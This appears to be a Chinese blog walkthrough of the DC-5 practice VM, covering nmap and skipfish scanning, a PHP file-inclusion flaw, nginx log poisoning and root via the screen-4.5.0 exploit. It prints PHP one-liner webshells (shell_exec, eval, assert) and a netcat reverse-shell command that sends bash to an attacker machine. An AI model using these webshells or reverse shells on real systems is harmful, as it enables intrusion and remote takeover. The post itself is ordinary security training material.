码迷,mamicode.com
首页 > 其他好文 > 详细

DC-5靶机WalkThrough

时间:2020-05-10 17:15:48      阅读:113      评论:0      收藏:0      [点我收藏+]

标签:linux   wce   程序   roo   temp   需要   网址   变化   有一个   

DC~5:WalkThrough

技术图片



信息收集

主机发现

nmap --system-dns -sP 10.0.0.1/24 --excludefile no_scan.txt | grep 10.0.0. | awk ‘{print $5}‘ > target.txt && cat target.txt

技术图片

端口扫描

nmap -T4 -A -iL target.txt

技术图片

网站扫描

使用skipfish对目标进行扫描,并将结果保存成web页面格式

skipfish -o /root/桌面/dc-5/ http://10.0.0.36

技术图片

还有一个隐藏的页面

技术图片

漏洞发现

访问目标80端口。访问contact.php,填写First Name和Last Name,发现数据以GET方式传递

技术图片

当改变传入数据时,copyright的日期会发生变化

技术图片

文件包含

结合刚才使用skipfish扫描到的隐藏php文件,猜测目标会调用该隐藏文件,所以尝试文件包含

技术图片

成功读取到文件内容,目标存在文件包含

漏洞利用

写入php后门

接下来可以将php后门写入nginx日志中,nginx日志默认路径可以在网上搜索得知。写入后使用文件包含漏洞触发日志中的php后门代码。nginx默认日志路径为/var/log/nginx/access.log和/var/log/nginx/error.log

首先写入一句话后门到目标日志,这里需要使用burp修改GET请求

<? php echo shell_exec($_GET[‘cmd‘]);?>

技术图片

反弹shell

然后执行nc命令将目标bash反弹给kali

技术图片

kali侦听4444的端口成功获取shell

技术图片

使用python“升级”获取的shell

技术图片

提权

接下来收集目标机器有价值的信息,查看目标系统信息,查看suid权限的命令

find / -user root -perm -4000 -print 2>/dev/null

技术图片

screen-4.5.0

screen-4.5.0有本地提权漏洞,可在searchsploit中搜索到相关漏洞

searchsploit screen 4.5.0

技术图片

将41154.sh,复制到根目录,使用im打开,修改编码格式为linux上的编码格式

技术图片

更改完成后使用file查看

技术图片

由于无法在靶机扫荡编译c文件,所以只能在kali上先编译好再上传脚本所需文件到目标执行。按照脚本中的步骤手动创建文件,再执行所给的gcc命令,最后的文件是:

技术图片

使用ftp获取所需文件

技术图片

执行脚本

技术图片

成功获取root权限,查看root目录

技术图片

总结

nmap

nmap指定excludefile,不扫描文件中的IP

nmap --system-dns -sP 10.0.0.1/24 --excludefile no_scan.txt | grep 10.0.0. | awk ‘{print $5}‘ > target.txt && cat target.txt

skipfish

使用skipfish时,需先指定输出目录,再指定扫描的目标,否则程序会报错

skipfish -o /root/桌面/dc-5/ http://10.0.0.36

文件包含利用

单纯的文件包含漏洞危害可能不是很大,但是使用文件包含去访问具有恶意代码的文件时(如具有可执行权限的日志文件,攻击者通过某种手段将恶意代码写入日志文件中),可能会造成更严重的后果

NC获取shell

使用nc进行连接时,将shell传递给对方

nc -vlp 9527  #侦听端
nc -nv 10.0.0.26 -c /bin/bash  #连接方传递bash到侦听端

PHP一句话后门

php一句话后门可参考网址

<? php echo shell_exec($_GET[‘cmd‘]);?>
<? php eval(@$_POST[‘arg‘]);?>
<? php assert(@$_POST[‘arg‘]);?>

DC-5靶机WalkThrough

标签:linux   wce   程序   roo   temp   需要   网址   变化   有一个   

原文地址:https://www.cnblogs.com/zhaoritian12138/p/12863578.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!